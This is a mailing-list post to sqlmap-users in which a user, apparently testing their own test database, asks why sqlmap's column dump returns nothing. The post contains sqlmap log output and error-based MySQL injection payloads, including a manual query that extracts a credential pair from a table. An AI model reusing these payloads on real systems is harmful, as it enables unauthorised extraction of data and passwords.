Thread: [sqlmap-users] Can't extract any columns or rows all of a sudden

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hello!

I was playing around with sqlmap at home, and I noticed all of a sudden
that I couldn't get it to extract any columns or rows all of a sudden.
Database names, current users, tables and such works fine, but
extracting any columns with --dump doesn't work, and thus not getting
any rows either. --columns seems to work though, although if I do that
first and then --dump, it still wont work.

Here's some output from sqlmap:

At revision 4654.

[00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test'
on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the number of columns for table
'test' on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the columns for any table on
database 'testDB'
[00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for
table 'test' on database 'testDB'
[00:47:13] [WARNING] the SQL query provided does not return any output
[00:47:13] [INFO] analyzing table dump for possible password hashes
Database: testDB
Table: test
[0 entries]
+----------+----------+
| strTest1 | strTest2 |
+----------+----------+
+----------+----------+

The vulnerability used by sqlmap is the following error based one:

---
Place: GET
Parameter: q
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: q=2) AND (SELECT 2155 FROM(SELECT
COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE
0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
---

And if I try to extract data manually through my browser, then it works
perfectly:

Notice the extracted data: te...@ma...:aPassword

Duplicate entry te...@ma...:aPassword :gtb:1' for key 'group_key'
select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557)
THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test
GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 =
2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1
ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY
x)a) AND (8882=8882)

PS: I tried specifying with "-C strTest1,strTest2" as well

Any ideas? :-)

Thanks in advance, and thanks for a great tool (helps me a lot in my
work, and saves me time from having to write my own scripts all the time
to test my software)!